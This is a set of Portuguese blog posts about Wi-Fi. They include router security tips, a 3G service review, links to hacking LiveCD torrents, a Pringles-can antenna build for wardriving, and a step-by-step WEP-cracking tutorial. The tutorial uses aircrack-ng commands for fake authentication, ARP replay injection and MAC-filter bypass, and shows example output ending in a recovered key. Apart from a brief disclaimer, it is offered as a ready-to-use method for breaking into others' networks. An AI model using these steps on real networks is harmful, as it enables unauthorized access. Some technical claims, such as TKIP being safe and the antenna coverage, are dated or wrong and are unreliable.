• Basicamente, o tipo de segurança que tem a maior fragilidade é o WEP, portanto, ao configurar seu roteador, prefira o uso de WPA;
• Muita gente fala que WEP é mais rápido que o WPA e que seu suporte é maior entre os aparelhos de mercado. Ainda não vi nenhum computador, celular, etc, que não aceitasse WPA. Além disso, vale muito mais ter uma internet um pouco mais lenta, do que estar vulnerável aos ataques de redes sem fio;
• O Brasil é um país com legislação muito fraca para abuso na internet, mas a coisa está mudando, vide comunicados que estão saindo na mídia sobre os crimes virtuais. A própria Google teve que abrir os dados do Orkut para procurar pornografia infantil. Agora, imagine alguém usufruindo da sua rede sem fio para realizar crimes virtuais e você tornar-se culpado ? Triste, não? ;

Para começar, tome nota dos seguintes pontos:

• Mude o sistema de codificação do seu roteador para WPA, se possível, ative o TKIP. Roteadores como DLINK e Linksys você pode fazer isso facilmente através da interface web;
• Utilize senhas non-standard, ou seja, que não sejam nomes, datas, ou algo que possa ser encontrado facilmente em dicionários. Uma das formas de quebrar o WPA é usando o método de força bruta, que fica tentando uma vasta combinação de palavras e de dicionários. Quanto mais complexa, mais tempo leva para quebrar;
• Falando um pouco mais de senha, quanto maior a combinação de letras e números, usando uma regra de distância entre palavras, maior a chance de sua rede ficar intacta. Em outras palavras, tente não usar senhas como abc123 ;
• Utilize seu roteador wireless apenas com conexões wireless. Evite conexões via cabo e wireless simultaneamente e eu explico o motivo… Sistemas operacionais como Windows, por exemplo, utilizam pacotes ARP para comunicações internas e é justamente aí que mora o perigo. O método de injeção de pacotes, que é o mais funcional para quebrar as redes, utiliza justamente pacotes ARP para quebrar a criptografia;
• Diminua a intensidade do sinal de seu roteador wireless. A chance de alguém captar o sinal é menor;
• Se estiver comprando roteador novo, verifique se já possui sistema anti-invasão. Muitos já possuem e o custo não muda muito;

Bem, é isso… Acho que cobri os pontos principais. Realmente só é atacado quem não tem conhecimento ou quem realmente quer.

Dúvidas ? Faça contato.

Bookmarks

Meu blog tem recebido uma enxurrada de acessos do google por causa dos posts sobre wireless, como quebrar redes wireless, antena com lata de batata pringles, sistemas operacionais para quebrar redes wireless e assim por diante.

Para dar continuidade na série de posts, achei uma nova distribuição linux voltada para quebrar redes wireless. É um Linux LiveCD, ou seja, você coloca no CDRom e ele faz boot sozinho, sem precisar instalar nada.

Conta com ferramentas para monitoramento, aircrack, drivers para adaptadores usb (principalmente o dlink gwl-122).

Para baixar o torrent do Wireless Hacking LiveCD, basta ir no site do ISOHUNT e baixar. O link está logo abaixo!

** ATUALIZADO **
http://isohunt.com/torrent_details/16765297/wireless+hacking?tab=summary

Boa diversão !

Bookmarks

Fiz um teste com a internet trêsG (3g) oferecida pela Claro aqui em São Paulo. Veja aqui as considerações.

1- Instalação do modem Claro 3g

Para Windows (XP, 2000, 98) o processo é simples. Basta colocar o CD no leitor, colocar o modem na porta USB que todo processo é detectado automaticamente e instalado.

Para MacOS, existe um instalador que cria o discador automaticamente. Abra o Cd-rom e execute o programa que está na raiz.

No linux, basta configurar uma conexão ppp para o dispositivo. Ele é reconhecido como dispositivo usb automaticamente.

2 – Mobilidade

Fiz testes levando meu notebook para vários cantos. Subi escada, desci escada. Entrei em quartos, elevador, etc e realmente fiquei surpreendido. Onde meu celular tinha sinal, a internet 3g da Claro funcionava sem problemas. Algumas interferências apenas deixavam a navegação um pouco mais lenta, mais nada alarmante.

3 – Velocidade

O pacote 3g Claro contratado foi de 1Mbps (1 mega). Fiz diversos testes com download e chegava na casa dos 98 – 100kb por segundo sem problemas, cumprindo com o que foi prometido. Somente o upload que deixou um pouco a desejar, ficava variando muito a velocidade, mas comparando com o speedy, ainda é um avião.

4 – Afinal, qual internet assinar ?

A resposta dessa pergunta é depende! Depende pra que você quer usar.

- Se você quer mobilidade, ou seja, poder acessar através de um notebook de diversos pontos, o 3g da Claro é a melhor opção;

- Se você quer uma internet para baixar e enviar muitos arquivos, o Vírtua é o mais indicado por causa do double-flash (mesma velocidade de baixar e enviar arquivos, ou em outras palavras de download e upload). Nos torrents da vida, faz aumentar muito seu download, tendo upload rápido;

- O speedy eu não recomendo. Só se não tiver outra escolha mesmo (caso não haja vírtua). A Telefônica é muito enrolada, sem contar no cartel que sofremos durante anos, pagando provedor sem necessidade. Como a TVA faz parte da Telefônica, comprando o Ajato, você está comprando o “speedy”;

Um ponto importante, que recomendo a leitura, é sobre a questão de traffic shapping que as operadoras fazem para conter os downloads em torrent, emule, etc. Recomendo a leitura aqui no Blog.

É isso. Não deixem de comentar!

Bookmarks

Quebrar redes wireless usando WEP ou WPA não é mais um mistério

Tenho recebido algumas visitas e perguntas de muitas pessoas querendo saber como quebrar senhas de redes wireless que usem WEP ou WPA.

Ambas podem ser quebradas facilmente, utilizando uma série de utilitários da aircrack. Se você quiser detalhes, basta acessar meu tutorial de como quebrar senha wep e wpa em redes wireless.

Além disso, para conseguir pegar redes mais distantes, você precisa de um amplificador, ou seja, de uma antena. Aqui no blog você encontra um post falando como você pode montar sua antena wireless usando lata de batata pringles, lata de óleo e um adaptador usb.

Enfim, continuando…

O intuito desse post é mostrar uma nova ferramenta linux específica para o mundo da segurança. É uma live distro, ou seja, um cd bootável baseado no Slackware e no Slax. O nome dessa distribuição é BackTrack e possui diversos utilitários para aqueles que querem brincar de hacker.

Algumas funcionalidades:

• Finger no google;
• Exploits, sql injection;
• Scanners de porta e de vulnerabilidades;
• Ferramentas de ataque à password;
• Sniffers de redes (descript, msn, icq, etc)
• Ferramentas para wireless (aircrack, airodump, kismet, switch drivers)
• Suporte à máquinas virtuais e muito mais…..

Download do BackTrack:

• Torrent para instalação na Vmware
• Distribuição para ser queimada em CD

Links úteis:

• Pra que serve e como baixar torrents
• Site do BackTrack linux
• BackTrack na Vmware

Bookmarks

Hoje acordei com vontade de pesquisar sobre segurança em redes wireless e me surpreendi com os resultados!

POST ATUALIZADO:
Alguns usuários relataram que alguns roteadores novos não estão possibilitando quebrar a senha WEP nem WPA. É importante lembrar que o sinal da sua placa wireless tem que estar forte. Aqui no blog, coloquei um post de como fazer uma antena wireless usando lata de batata pringles ou lata de óleo, também chamada de Cantenna. No site da aircrack também há alguns updates do software e de drivers.

Há pelo menos uns quatro ou cinco softwares bons para quebrar segurança em redes que utilizam WEP ou WPA e o ataque, apesar de usar força bruta e um pouco de matemática, realmente funciona.

O intuito aqui não é estimular o ataque às redes disponíveis e sim mostrar um pouco da fragilidade de segurança.

Vamos aos fatos, ou melhor, aos artefatos

Objetivos:
=========
– Pesquisar o modo que os pacotes são transmitidos pela rede sem fio;
– Localizar uma forma de captar os pacotes através de um sniffer;
– Quebrar a senha WEP / WPA;

Minha pesquisa baseou-se inicialmente no modo em que os pacotes são enviados pela rede sem fio e de uma possível forma de captar os pacotes. A partir desse princípio, localizar uma forma de quebrar a criptografia do WEP e do WPA.

A brincadeira consiste em deixar seu adaptador de rede sem fio no modo de monitoramento, para que seja capaz de ler os pacotes que estão “voando” e injetar de volta no AccessPoint gerando tráfego suficiente para a quebra da chave.

O princípio é o mesmo usado no modo de capturamento de pacotes das redes que utilizam hub ou os antigos cabos coaxiais: Quem estiver “conectado” pode checar se aquela informação realmente lhe pertence. Se temos um adaptador wireless que esteja ao alcance do AccessPoint(AP), podemos verificar os pacotes.

Nota 1:
Você pode ler meu outro post que fala sobre a criação de uma Cantena ou Cantenna, usando uma lata de batata pringles, amplificando seu sinal. Para quem não acredita, realmente funciona.

Nota 2:
Para poder executar os passos aqui citados, sua placa de rede PRECISA TER SUPORTE AO MODO DE MONITORAMENTO E INJEÇÃO DE PACOTES!

http://www.aircrack-ng.org/doku.php?id=compatibility_drivers

Nota 3:
Se você tiver que comprar uma placa de rede Wireless, aproveite para achar uma que tenha conector para acoplar antena externa.

Utilitários:
============
– Notebook rodando Mandriva Linux 2008 (ou qualquer outra distribuição linux) dentro de uma Virtual Machine [abaixo explico os motivos]
– Aircrack-ng, aireplay, airodump-ng [ http://www.aircrack-ng.org/ ]
– Adaptador Wireless USB GWL-G122 Revisão C [ Ver compatibilidade no site do Aircrack ]

Por que usar linux ?
Simples: O número de placas que possuem suporte ao modo de monitoramento e ao modo de injeção de pacotes é muito maior que no Windows. A maioria dos fabricantes desenvolve drivers que possuem este modo desabilitado para justamente evitar este tipo de “ataque”.

Por que usar uma Virtual Machine ?
Gosto de simplicidade: Meu notebook está com Windows e o trabalho para reparticionar o HD e instalar o linux no modo DualBoot não compensa. É mais simples aproveitar os benefícios da emulação de outro sistema operacional.

Não está no escopo desse post os detalhes da instalação do Linux, mas se você tiver o VMWare (software responsável por emular SO’s), no próprio site do Aircrack já tem uma prontinha pra usar

http://www.aircrack-ng.org/doku.php#virtual_machine1

Quebrando as senhas:
===================

WEP
Mais fácil de quebrar, pois o ataque apesar de usar força bruta, utiliza estatística e pedaços da chave enviado nos pacotes para acelerar a quebra.

Quanto mais IV’s capturados pelo Aircrack, maior a chance de quebra. IV é um pacote capturado que pode ser usado para recuperar um pedaço de chave.

Uma dica importante é não ficar esperando a rede enviar IV’s para você e sim você tentar aumentar o número de capturas com ataques ARP, chopchop e fragmentação.

Todos os comandos deverão ser rodados em um terminal, logado como root:

1 – Rode o comando abaixo para validar os AccessPoints ativos:
aircrack-ng interface_rede

Localize AccessPoint desejado e pare o comando com ctrl+c. Vamos filtrar a execução para garantir maior número de pacotes coletados, já que o scan é feito por canais de 1 a 12.

2 – Filtre a rede desejada por canal / bssid e deixe ele parado rodando.
aircrack-ng -c canal –bssid 00:00:00:00 -w arquivo_saida interface_rede

Onde:
canal = Canal mostrado pelo comando 1
00:00:00:00 = Mac Address do AccessPoint escolhido para o ataque mostrado no comando 1
arquivo_saida = Nome do arquivo que o aplicativo irá salvar e que será usado para capturar a senha
interface_rede = Interface wireless usada (wifi0, rausb0, etc)

Note que há colunas mostrando Beacons e IVs.
Podemos considerar Beacons como lixo para o nosso ataque e IVs para os pacotes que realmente interessam.

Consegui quebrar WEP com 5.000 IVs mas um número bom, gira em torno dos 80.000.

3 – Abra um novo terminal para tentarmos uma autenticação FAKE
aireplay-ng -1 0 -e nome -a bssid -h mac_sua_placa_rede interface_rede

Onde:
nome = ESSID da rede, ou melhor, o nome do AccessPoint que mostra pra você no comando 1
bssid = BSSID da rede (mac address do AP)
mac_sua_placa_rede = Mac Address da sua placa de rede
interface de rede = interface da rede wifi

Comando exemplo:
aireplay-ng -1 0 -e RedeWireless -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 rausb0

Se o comando funcionar, você verá um resultado assim:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
18:22:42 Sending keep-alive packet
18:22:52 Sending keep-alive packet

Mantenha esse terminal aberto para manter a associação falsa.

Nota: Alguns AccessPoints possuem filtro por MAC Address. Caso a associação não funcione, utilize o tcpdump para achar um MAC que esteja liberado e troque o MAC da sua placa com o MacChanger.

Um exemplo de execução de tcpdump seria:
tcpdump -n -e -s0 -vvv -i interface_rede

4 – Execução dos ataques

4.1 – Abra um novo terminal e execute o aireplay para tentar gerar replicação de pacote ARP
aireplay-ng -3 -b bssid -h mac_sua_placa interface_rede

Onde:
-3 = é o tipo de ataque ARP
bssid = Mac do AccessPoint
mac_sua_placa = Mac Address da sua placa de rede
interface_rede = Interface da rede wifi

Deixe o terminal parado por alguns minutos. Esse comando precisa de alguns pacotes ARP na rede para gerar o tráfego. Um usuário conectado com cabo no AP é suficiente para o ataque funcionar.

Exemplo de um comando que está executando com sucesso:
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…

Se funcionar, você verá o número de IVs crescer absurdamente. Pare os comandos quando estiver com +- 80.000 IVs e pule para o passo 5.

5 – Descubra a chave
aircrack-ng -b bssid arquivo*.cap

Onde:
bssid = Mac do AccessPoint que está ativo capturando pacotes
arquivo*.cap = Prefixo do arquivo colocado no comando 1

Se tudo der certo, aparecerá no meio da tela:
KEY FOUND! [ 12:34:56:78:90 ]
Decrypted correctly: 100%

Você nunca achará a chave original e sempre a chave em hexa. Remova os dois pontos “:” e tente conectar na rede. Bingo!!

6 – Se algo saiu errado..
Essa é a maneira mais fácil de conseguir a quebra. Há uma infinidade de jeitos de tentar gerar tráfego e IVs. Aqui vão alguns links que ajudarão a entender mais sobre os ataques:

[Forma simples de crackear]
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack&s=simple%20wep%20crack

[Formas de aumentar os IVs]
http://www.aircrack-ng.org/doku.php?id=i_am_injecting_but_the_ivs_don_t_increase

[Post no Warchalking]
http://capivara.warchalking.com.br/forum/viewtopic.php?p=8826&sid=598caa58d4ae9c0fdfe079be733bca4a

É isso aí

Tem segurança ou não ?

Bookmarks

Depois que troquei de notebook, achei que o adaptador ia virar sucata, jogado num canto daqui de casa. Como estava pesquisando sobre segurança em redes wireless, acabei descobrindo que o maledeto aceitava modo de monitoramento e injeção de pacotes! Faltava um jeito de amplificar o sinal para poder brincar de procurar redes e quem sabe fazer um teste andando com o carro na rua (wardriving). Eis o resultado!

O material para fabricar é simples, eu gastei ao todo R$20,00 para montar:

- 1 lata de batata pringles – R$ 7,50

- 1 pacote de parafusos para prender telha. Essa aqui é a sacada, pois o parafuso tem 20cm de comprimento e já vem com porcas e arruelas – R$ 12,50

- Cola quente (aquelas de silicone) – Já tinha em casa

- Pedaço pequeno de papelão – Já tinha em casa

- Tesoura – Já tinha em casa

- Extensor USB – Já tinha em casa

- Um pouco de criatividade – Sem comentários

Passo 1) Dispositivo de metal para captar sinal

- Divida o parafuso em 4 partes iguais e prenda as arruelas. Eu prendi com cola quente.

- Coloque um parafuso no final da rosca, para servir de suporte para a tampa.

Se você não conseguiu um parafuso, apenas uma peça de metal, cole a tampa.

Passo 2) Corte a lata para encaixar o adaptador wireless USB

- Uma nota importante é que o dispositivo USB tem que ficar exatamente a 8,4 cm da lata.

A onda do sinal wireless é de 2,4 ghz e existe um cálculo para determinar exatamente essa distância. Caso você não esteja usando uma lata de pringles e o diâmetro/comprimento da lata seja diferente, use a calculadora no link abaixo e adapte para suas necessidades.

http://www.saunalahti.fi/~elepal/antenna2calc.php

Há um pouco de teoria nesse link. É sempre bom saber o que se está fazendo

Passo 3) Faça um furo bem no meio da tampa da lata de pringles, para encaixar o dispositivo feito no passo 1.

Passo 4) Acoplando os dispositivos

- Corte um disco de papelão um pouco menor do diâmetro da boca da lata e faça um furo no meio. Isso vai garantir que o parafuso de metal não fique balançando na lata.

- Encaixe a tampa da lata de pringles e coloque o parafuso por cima.

- Encaixe o disco de papelão e passe um pouco de cola quente para fixar.

Passo 5) Coloque o dispositivo dentro da lata, o resultado, na figura abaixo

Passo 6) Encaixe o adaptador USB dentro do buraco, deixando bem perto do parafuso (não deixe encostar) e coloque umas tiras de papelão para segurá-lo para que não caia. Se quiser, passe um pouco de cola quente só para fixar.

O resultado final, tem que ficar parecido com isso. Agora está na hora de testar!!!

Essa é a imagem no Windows, mas existe um utilitário melhor pra medir sinal e qualidade dos AP’s, fazendo diferenciação por canal, chamado NetStumbler!

http://www.netstumbler.com/

Comentários importantes:

- Essa antena é do tipo YAGI, tem um alcance maior, mas cobre uma área menor (360 graus).

- Esse modelo é uma adaptação do tutorial original, que tem um conector “N” fêmea e um fio de cobre no lugar do adaptador usb, para usar em placas wireless que tenham suporte à antena externa.

http://www.hardware.com.pt/forum/viewtopic.php?t=40353

- Vi posts em fóruns que alguns caras melhoraram essa antena de pringles, trocando por uma lata de óleo (daquelas antigas – Lisa, Mazola, etc).

- Há outros tipos de antena, como as omnidirecional. Dá pra montar um AccessPoint e alcançar boas distâncias com equipamentos baratos e caseiros.

Façam bom proveito!

Bookmarks